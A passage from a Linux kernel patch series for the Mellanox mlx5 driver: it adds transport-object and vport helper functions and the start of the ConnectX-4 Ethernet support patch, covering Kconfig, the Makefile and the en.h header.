out[MLX5_ST_SZ_DW(destroy_sq_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_sq_in, in, opcode, MLX5_CMD_OP_DESTROY_SQ); + MLX5_SET(destroy_sq_in, in, sqn, sqn); + + mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); +} + +int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn) +{ + u32 
out[MLX5_ST_SZ_DW(create_tir_out)]; + int err; + + MLX5_SET(create_tir_in, in, opcode, MLX5_CMD_OP_CREATE_TIR); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *tirn = MLX5_GET(create_tir_out, out, tirn); + + return err; +} + +void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_tir_out)]; + u32 out[MLX5_ST_SZ_DW(destroy_tir_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_tir_in, in, opcode, MLX5_CMD_OP_DESTROY_TIR); + MLX5_SET(destroy_tir_in, in, tirn, tirn); + + mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); +} + +int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn) +{ + u32 out[MLX5_ST_SZ_DW(create_tis_out)]; + int err; + + MLX5_SET(create_tis_in, in, opcode, MLX5_CMD_OP_CREATE_TIS); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *tisn = MLX5_GET(create_tis_out, out, tisn); + + return err; +} + +void mlx5_destroy_tis(struct mlx5_core_dev *dev, u32 tisn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_tis_out)]; + u32 out[MLX5_ST_SZ_DW(destroy_tis_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_tis_in, in, opcode, MLX5_CMD_OP_DESTROY_TIS); + MLX5_SET(destroy_tis_in, in, tisn, tisn); + + mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h new file mode 100644 index 000000000000..1bc898cc4933 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h @@ -0,0 +1,47 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +#ifndef __TRANSOBJ_H__ +#define __TRANSOBJ_H__ + +int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn); +int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen); +void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn); +int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn); +int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen); +void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn); +int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn); +void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn); +int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn); +void mlx5_destroy_tis(struct mlx5_core_dev *dev, u32 tisn); + +#endif /* __TRANSOBJ_H__ */ diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c new file mode 100644 index 000000000000..ba374b9a6c87 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c @@ -0,0 +1,84 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +#include +#include +#include +#include "vport.h" +#include "mlx5_core.h" + +u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod) +{ + u32 in[MLX5_ST_SZ_DW(query_vport_state_in)]; + u32 out[MLX5_ST_SZ_DW(query_vport_state_out)]; + int err; + + memset(in, 0, sizeof(in)); + + MLX5_SET(query_vport_state_in, in, opcode, + MLX5_CMD_OP_QUERY_VPORT_STATE); + MLX5_SET(query_vport_state_in, in, op_mod, opmod); + + err = mlx5_cmd_exec_check_status(mdev, in, sizeof(in), out, + sizeof(out)); + if (err) + mlx5_core_warn(mdev, "MLX5_CMD_OP_QUERY_VPORT_STATE failed\n"); + + return MLX5_GET(query_vport_state_out, out, state); +} + +void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) +{ + u32 in[MLX5_ST_SZ_DW(query_nic_vport_context_in)]; + u32 *out; + int outlen = MLX5_ST_SZ_BYTES(query_nic_vport_context_out); + u8 *out_addr; + + out = mlx5_vzalloc(outlen); + if (!out) + return; + + out_addr = MLX5_ADDR_OF(query_nic_vport_context_out, out, + nic_vport_context.permanent_address); + + memset(in, 0, sizeof(in)); + + MLX5_SET(query_nic_vport_context_in, in, opcode, + MLX5_CMD_OP_QUERY_NIC_VPORT_CONTEXT); + + memset(out, 0, outlen); + mlx5_cmd_exec_check_status(mdev, in, sizeof(in), out, outlen); + + ether_addr_copy(addr, &out_addr[2]); + + kvfree(out); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.h b/drivers/net/ethernet/mellanox/mlx5/core/vport.h new file mode 100644 index 000000000000..c05ca2c3419d --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.h @@ -0,0 +1,41 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#ifndef __MLX5_VPORT_H__ +#define __MLX5_VPORT_H__ + +#include + +u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod); +void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr); + +#endif /* __MLX5_VPORT_H__ */ diff --git a/include/linux/mlx5/flow_table.h b/include/linux/mlx5/flow_table.h new file mode 100644 index 000000000000..5f922c6d4fc2 --- /dev/null +++ b/include/linux/mlx5/flow_table.h @@ -0,0 +1,54 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. 
+ * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#ifndef MLX5_FLOW_TABLE_H +#define MLX5_FLOW_TABLE_H + +#include + +struct mlx5_flow_table_group { + u8 log_sz; + u8 match_criteria_enable; + u32 match_criteria[MLX5_ST_SZ_DW(fte_match_param)]; +}; + +void *mlx5_create_flow_table(struct mlx5_core_dev *dev, u8 level, u8 table_type, + u16 num_groups, + struct mlx5_flow_table_group *group); +void mlx5_destroy_flow_table(void *flow_table); +int mlx5_add_flow_table_entry(void *flow_table, u8 match_criteria_enable, + void *match_criteria, void *flow_context, + u32 *flow_index); +void mlx5_del_flow_table_entry(void *flow_table, u32 flow_index); +u32 mlx5_get_flow_table_id(void *flow_table); + +#endif /* MLX5_FLOW_TABLE_H */ From f62b8bb8f2d30582f30f51e85a8c0e1260125d7e Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 28 May 2015 22:28:48 +0300 Subject: [PATCH 502/872] net/mlx5: Extend mlx5_core to support ConnectX-4 Ethernet functionality This is the Ethernet part of the driver for the Mellanox ConnectX(R)-4 Single/Dual-Port Adapter supporting 100Gb/s with VPI. The driver extends the existing mlx5 driver with Ethernet functionality. This patch contains the driver entry points but does not include transmit and receive (see the previous patch in the series) routines. It also adds the option MLX5_CORE_EN to Kconfig to enable/disable the Ethernet functionality. Currently, Kconfig is programmed to make Ethernet and Infiniband functionality mutally exclusive. Also changed MLX5_INFINIBAND to be depandant on MLX5_CORE instead of selecting it, since MLX5_CORE could be selected without MLX5_INFINIBAND being selected. Signed-off-by: Amir Vadai Signed-off-by: David S. 
Miller --- drivers/infiniband/hw/mlx5/Kconfig | 4 +- .../net/ethernet/mellanox/mlx5/core/Kconfig | 14 +- .../net/ethernet/mellanox/mlx5/core/Makefile | 3 + drivers/net/ethernet/mellanox/mlx5/core/cmd.c | 19 - drivers/net/ethernet/mellanox/mlx5/core/en.h | 520 +++++ .../ethernet/mellanox/mlx5/core/en_ethtool.c | 679 ++++++ .../net/ethernet/mellanox/mlx5/core/en_main.c | 1899 +++++++++++++++++ .../net/ethernet/mellanox/mlx5/core/main.c | 74 +- .../ethernet/mellanox/mlx5/core/mlx5_core.h | 9 +- include/linux/mlx5/device.h | 19 + include/linux/mlx5/driver.h | 1 + 11 files changed, 3213 insertions(+), 28 deletions(-) create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en.h create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_main.c diff --git a/drivers/infiniband/hw/mlx5/Kconfig b/drivers/infiniband/hw/mlx5/Kconfig index 10df386c6344..bce263b92821 100644 --- a/drivers/infiniband/hw/mlx5/Kconfig +++ b/drivers/infiniband/hw/mlx5/Kconfig @@ -1,8 +1,6 @@ config MLX5_INFINIBAND tristate "Mellanox Connect-IB HCA support" - depends on NETDEVICES && ETHERNET && PCI - select NET_VENDOR_MELLANOX - select MLX5_CORE + depends on NETDEVICES && ETHERNET && PCI && MLX5_CORE ---help--- This driver provides low-level InfiniBand support for Mellanox Connect-IB PCI Express host channel adapters (HCAs). diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Kconfig b/drivers/net/ethernet/mellanox/mlx5/core/Kconfig index 8ff57e8e3e91..0d7aef040fb0 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Kconfig +++ b/drivers/net/ethernet/mellanox/mlx5/core/Kconfig @@ -3,6 +3,18 @@ # config MLX5_CORE - tristate + tristate "Mellanox Technologies ConnectX-4 and Connect-IB core driver" depends on PCI default n + ---help--- + Core driver for low level functionality of the ConnectX-4 and + Connect-IB cards by Mellanox Technologies. + +config MLX5_CORE_EN + bool "Mellanox Technologies ConnectX-4 Ethernet support" + depends on MLX5_INFINIBAND=n && NETDEVICES && ETHERNET && PCI && MLX5_CORE + default n + ---help--- + Ethernet support in Mellanox Technologies ConnectX-4 NIC. + Ethernet and Infiniband support in ConnectX-4 are currently mutually + exclusive. 
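Because MLX5_CORE_EN is a bool that only adds objects to the existing mlx5_core module (see the Makefile hunk below), core code can gate its calls into the Ethernet part at compile time. The following is a hypothetical sketch of that pattern, not code from this patch; mlx5e_attach() is an invented name used only for illustration:

#include <linux/mlx5/driver.h>

#ifdef CONFIG_MLX5_CORE_EN
void mlx5e_attach(struct mlx5_core_dev *dev);
#else
static inline void mlx5e_attach(struct mlx5_core_dev *dev) {}
#endif

static void example_probe_ethernet(struct mlx5_core_dev *dev)
{
	mlx5e_attach(dev);	/* becomes a no-op stub when MLX5_CORE_EN=n */
}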
diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Makefile b/drivers/net/ethernet/mellanox/mlx5/core/Makefile index 105780bb980b..87e9e606596a 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Makefile +++ b/drivers/net/ethernet/mellanox/mlx5/core/Makefile @@ -3,3 +3,6 @@ obj-$(CONFIG_MLX5_CORE) += mlx5_core.o mlx5_core-y := main.o cmd.o debugfs.o fw.o eq.o uar.o pagealloc.o \ health.o mcg.o cq.o srq.o alloc.o qp.o port.o mr.o pd.o \ mad.o +mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o vport.o transobj.o \ + en_main.o en_flow_table.o en_ethtool.o en_tx.o en_rx.o \ + en_txrx.o diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c index 2f22cd2de2b0..75ff58dc1ff5 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c @@ -75,25 +75,6 @@ enum { MLX5_CMD_DELIVERY_STAT_CMD_DESCR_ERR = 0x10, }; -enum { - MLX5_CMD_STAT_OK = 0x0, - MLX5_CMD_STAT_INT_ERR = 0x1, - MLX5_CMD_STAT_BAD_OP_ERR = 0x2, - MLX5_CMD_STAT_BAD_PARAM_ERR = 0x3, - MLX5_CMD_STAT_BAD_SYS_STATE_ERR = 0x4, - MLX5_CMD_STAT_BAD_RES_ERR = 0x5, - MLX5_CMD_STAT_RES_BUSY = 0x6, - MLX5_CMD_STAT_LIM_ERR = 0x8, - MLX5_CMD_STAT_BAD_RES_STATE_ERR = 0x9, - MLX5_CMD_STAT_IX_ERR = 0xa, - MLX5_CMD_STAT_NO_RES_ERR = 0xf, - MLX5_CMD_STAT_BAD_INP_LEN_ERR = 0x50, - MLX5_CMD_STAT_BAD_OUTP_LEN_ERR = 0x51, - MLX5_CMD_STAT_BAD_QP_STATE_ERR = 0x10, - MLX5_CMD_STAT_BAD_PKT_ERR = 0x30, - MLX5_CMD_STAT_BAD_SIZE_OUTS_CQES_ERR = 0x40, -}; - static struct mlx5_cmd_work_ent *alloc_cmd(struct mlx5_cmd *cmd, struct mlx5_cmd_msg *in, struct mlx5_cmd_msg *out, diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h new file mode 100644 index 000000000000..cbb3c7cb53f7 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h @@ -0,0 +1,520 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. 
+ */ + +#include +#include +#include +#include +#include +#include "vport.h" +#include "wq.h" +#include "transobj.h" +#include "mlx5_core.h" + +#define MLX5E_MAX_NUM_TC 8 + +#define MLX5E_PARAMS_MINIMUM_LOG_SQ_SIZE 0x7 +#define MLX5E_PARAMS_DEFAULT_LOG_SQ_SIZE 0xa +#define MLX5E_PARAMS_MAXIMUM_LOG_SQ_SIZE 0xd + +#define MLX5E_PARAMS_MINIMUM_LOG_RQ_SIZE 0x7 +#define MLX5E_PARAMS_DEFAULT_LOG_RQ_SIZE 0xa +#define MLX5E_PARAMS_MAXIMUM_LOG_RQ_SIZE 0xd + +#define MLX5E_PARAMS_DEFAULT_LRO_WQE_SZ (16 * 1024) +#define MLX5E_PARAMS_DEFAULT_RX_CQ_MODERATION_USEC 0x10 +#define MLX5E_PARAMS_DEFAULT_RX_CQ_MODERATION_PKTS 0x20 +#define MLX5E_PARAMS_DEFAULT_TX_CQ_MODERATION_USEC 0x10 +#define MLX5E_PARAMS_DEFAULT_TX_CQ_MODERATION_PKTS 0x20 +#define MLX5E_PARAMS_DEFAULT_MIN_RX_WQES 0x80 +#define MLX5E_PARAMS_DEFAULT_RX_HASH_LOG_TBL_SZ 0x7 +#define MLX5E_PARAMS_MIN_MTU 46 + +#define MLX5E_TX_CQ_POLL_BUDGET 128 +#define MLX5E_UPDATE_STATS_INTERVAL 200 /* msecs */ + +static const char vport_strings[][ETH_GSTRING_LEN] = { + /* vport statistics */ + "rx_packets", + "rx_bytes", + "tx_packets", + "tx_bytes", + "rx_error_packets", + "rx_error_bytes", + "tx_error_packets", + "tx_error_bytes", + "rx_unicast_packets", + "rx_unicast_bytes", + "tx_unicast_packets", + "tx_unicast_bytes", + "rx_multicast_packets", + "rx_multicast_bytes", + "tx_multicast_packets", + "tx_multicast_bytes", + "rx_broadcast_packets", + "rx_broadcast_bytes", + "tx_broadcast_packets", + "tx_broadcast_bytes", + + /* SW counters */ + "tso_packets", + "tso_bytes", + "lro_packets", + "lro_bytes", + "rx_csum_good", + "rx_csum_none", + "tx_csum_offload", + "tx_queue_stopped", + "tx_queue_wake", + "tx_queue_dropped", + "rx_wqe_err", +}; + +struct mlx5e_vport_stats { + /* HW counters */ + u64 rx_packets; + u64 rx_bytes; + u64 tx_packets; + u64 tx_bytes; + u64 rx_error_packets; + u64 rx_error_bytes; + u64 tx_error_packets; + u64 tx_error_bytes; + u64 rx_unicast_packets; + u64 rx_unicast_bytes; + u64 tx_unicast_packets; + u64 tx_unicast_bytes; + u64 rx_multicast_packets; + u64 rx_multicast_bytes; + u64 tx_multicast_packets; + u64 tx_multicast_bytes; + u64 rx_broadcast_packets; + u64 rx_broadcast_bytes; + u64 tx_broadcast_packets; + u64 tx_broadcast_bytes; + + /* SW counters */ + u64 tso_packets; + u64 tso_bytes; + u64 lro_packets; + u64 lro_bytes; + u64 rx_csum_good; + u64 rx_csum_none; + u64 tx_csum_offload; + u64 tx_queue_stopped; + u64 tx_queue_wake; + u64 tx_queue_dropped; + u64 rx_wqe_err; + +#define NUM_VPORT_COUNTERS 31 +}; + +static const char rq_stats_strings[][ETH_GSTRING_LEN] = { + "packets", + "csum_none", + "lro_packets", + "lro_bytes", + "wqe_err" +}; + +struct mlx5e_rq_stats { + u64 packets; + u64 csum_none; + u64 lro_packets; + u64 lro_bytes; + u64 wqe_err; +#define NUM_RQ_STATS 5 +}; + +static const char sq_stats_strings[][ETH_GSTRING_LEN] = { + "packets", + "tso_packets", + "tso_bytes", + "csum_offload_none", + "stopped", + "wake", + "dropped", + "nop" +}; + +struct mlx5e_sq_stats { + u64 packets; + u64 tso_packets; + u64 tso_bytes; + u64 csum_offload_none; + u64 stopped; + u64 wake; + u64 dropped; + u64 nop; +#define NUM_SQ_STATS 8 +}; + +struct mlx5e_stats { + struct mlx5e_vport_stats vport; +}; + +struct mlx5e_params { + u8 log_sq_size; + u8 log_rq_size; + u16 num_channels; + u8 default_vlan_prio; + u8 num_tc; + u16 rx_cq_moderation_usec; + u16 rx_cq_moderation_pkts; + u16 tx_cq_moderation_usec; + u16 tx_cq_moderation_pkts; + u16 min_rx_wqes; + u16 rx_hash_log_tbl_sz; + bool lro_en; + u32 lro_wqe_sz; +}; + +enum { + 
MLX5E_RQ_STATE_POST_WQES_ENABLE, +}; + +enum cq_flags { + MLX5E_CQ_HAS_CQES = 1, +}; + +struct mlx5e_cq { + /* data path - accessed per cqe */ + struct mlx5_cqwq wq; + void *sqrq; + unsigned long flags; + + /* data path - accessed per napi poll */ + struct napi_struct *napi; + struct mlx5_core_cq mcq; + struct mlx5e_channel *channel; + + /* control */ + struct mlx5_wq_ctrl wq_ctrl; +} ____cacheline_aligned_in_smp; + +struct mlx5e_rq { + /* data path */ + struct mlx5_wq_ll wq; + u32 wqe_sz; + struct sk_buff **skb; + + struct device *pdev; + struct net_device *netdev; + struct mlx5e_rq_stats stats; + struct mlx5e_cq cq; + + unsigned long state; + int ix; + + /* control */ + struct mlx5_wq_ctrl wq_ctrl; + u32 rqn; + struct mlx5e_channel *channel; +} ____cacheline_aligned_in_smp; + +struct mlx5e_tx_skb_cb { + u32 num_bytes; + u8 num_wqebbs; + u8 num_dma; +}; + +#define MLX5E_TX_SKB_CB(__skb) ((struct mlx5e_tx_skb_cb *)__skb->cb) + +struct mlx5e_sq_dma { + dma_addr_t addr; + u32 size; +}; + +enum { + MLX5E_SQ_STATE_WAKE_TXQ_ENABLE, +}; + +struct mlx5e_sq { + /* data path */ + + /* dirtied @completion */ + u16 cc; + u32 dma_fifo_cc; + + /* dirtied @xmit */ + u16 pc ____cacheline_aligned_in_smp; + u32 dma_fifo_pc; + u32 bf_offset; + struct mlx5e_sq_stats stats; + + struct mlx5e_cq cq; + + /* pointers to per packet info: write@xmit, read@completion */ + struct sk_buff **skb; + struct mlx5e_sq_dma *dma_fifo; + + /* read only */ + struct mlx5_wq_cyc wq; + u32 dma_fifo_mask; + void __iomem *uar_map; + struct netdev_queue *txq; + u32 sqn; + u32 bf_buf_size; + struct device *pdev; + __be32 mkey_be; + unsigned long state; + + /* control path */ + struct mlx5_wq_ctrl wq_ctrl; + struct mlx5_uar uar; + struct mlx5e_channel *channel; + int tc; +} ____cacheline_aligned_in_smp; + +static inline bool mlx5e_sq_has_room_for(struct mlx5e_sq *sq, u16 n) +{ + return (((sq->wq.sz_m1 & (sq->cc - sq->pc)) >= n) || + (sq->cc == sq->pc)); +} + +enum channel_flags { + MLX5E_CHANNEL_NAPI_SCHED = 1, +}; + +struct mlx5e_channel { + /* data path */ + struct mlx5e_rq rq; + struct mlx5e_sq sq[MLX5E_MAX_NUM_TC]; + struct napi_struct napi; + struct device *pdev; + struct net_device *netdev; + __be32 mkey_be; + u8 num_tc; + unsigned long flags; + + /* control */ + struct mlx5e_priv *priv; + int ix; + int cpu; +}; + +enum mlx5e_traffic_types { + MLX5E_TT_IPV4_TCP = 0, + MLX5E_TT_IPV6_TCP = 1, + MLX5E_TT_IPV4_UDP = 2, + MLX5E_TT_IPV6_UDP = 3, + MLX5E_TT_IPV4 = 4, + MLX5E_TT_IPV6 = 5, + MLX5E_TT_ANY = 6, + MLX5E_NUM_TT = 7, +}; + +enum { + MLX5E_RQT_SPREADING = 0, + MLX5E_RQT_DEFAULT_RQ = 1, + MLX5E_NUM_RQT = 2, +}; + +struct mlx5e_eth_addr_info { + u8 addr[ETH_ALEN + 2]; + u32 tt_vec; + u32 ft_ix[MLX5E_NUM_TT]; /* flow table index per traffic type */ +}; + +#define MLX5E_ETH_ADDR_HASH_SIZE (1 << BITS_PER_BYTE) + +struct mlx5e_eth_addr_db { + struct hlist_head netdev_uc[MLX5E_ETH_ADDR_HASH_SIZE]; + struct hlist_head netdev_mc[MLX5E_ETH_ADDR_HASH_SIZE]; + struct mlx5e_eth_addr_info broadcast; + struct mlx5e_eth_addr_info allmulti; + struct mlx5e_eth_addr_info promisc; + bool broadcast_enabled; + bool allmulti_enabled; + bool promisc_enabled; +}; + +enum { + MLX5E_STATE_ASYNC_EVENTS_ENABLE, + MLX5E_STATE_OPENED, +}; + +struct mlx5e_vlan_db { + unsigned long active_vlans[BITS_TO_LONGS(VLAN_N_VID)]; + u32 active_vlans_ft_ix[VLAN_N_VID]; + u32 untagged_rule_ft_ix; + u32 any_vlan_rule_ft_ix; + bool filter_disabled; +}; + +struct mlx5e_flow_table { + void *vlan; + void *main; +}; + +struct mlx5e_priv { + /* priv data path fields - start */ 
+ int order_base_2_num_channels; + int queue_mapping_channel_mask; + int num_tc; + int default_vlan_prio; + /* priv data path fields - end */ + + unsigned long state; + struct mutex state_lock; /* Protects Interface state */ + struct mlx5_uar cq_uar; + u32 pdn; + struct mlx5_core_mr mr; + + struct mlx5e_channel **channel; + u32 tisn[MLX5E_MAX_NUM_TC]; + u32 rqtn; + u32 tirn[MLX5E_NUM_TT]; + + struct mlx5e_flow_table ft; + struct mlx5e_eth_addr_db eth_addr; + struct mlx5e_vlan_db vlan; + + struct mlx5e_params params; + spinlock_t async_events_spinlock; /* sync hw events */ + struct work_struct update_carrier_work; + struct work_struct set_rx_mode_work; + struct delayed_work update_stats_work; + + struct mlx5_core_dev *mdev; + struct net_device *netdev; + struct mlx5e_stats stats; +}; + +#define MLX5E_NET_IP_ALIGN 2 + +struct mlx5e_tx_wqe { + struct mlx5_wqe_ctrl_seg ctrl; + struct mlx5_wqe_eth_seg eth; +}; + +struct mlx5e_rx_wqe { + struct mlx5_wqe_srq_next_seg next; + struct mlx5_wqe_data_seg data; +}; + +enum mlx5e_link_mode { + MLX5E_1000BASE_CX_SGMII = 0, + MLX5E_1000BASE_KX = 1, + MLX5E_10GBASE_CX4 = 2, + MLX5E_10GBASE_KX4 = 3, + MLX5E_10GBASE_KR = 4, + MLX5E_20GBASE_KR2 = 5, + MLX5E_40GBASE_CR4 = 6, + MLX5E_40GBASE_KR4 = 7, + MLX5E_56GBASE_R4 = 8, + MLX5E_10GBASE_CR = 12, + MLX5E_10GBASE_SR = 13, + MLX5E_10GBASE_ER = 14, + MLX5E_40GBASE_SR4 = 15, + MLX5E_40GBASE_LR4 = 16, + MLX5E_100GBASE_CR4 = 20, + MLX5E_100GBASE_SR4 = 21, + MLX5E_100GBASE_KR4 = 22, + MLX5E_100GBASE_LR4 = 23, + MLX5E_100BASE_TX = 24, + MLX5E_100BASE_T = 25, + MLX5E_10GBASE_T = 26, + MLX5E_25GBASE_CR = 27, + MLX5E_25GBASE_KR = 28, + MLX5E_25GBASE_SR = 29, + MLX5E_50GBASE_CR2 = 30, + 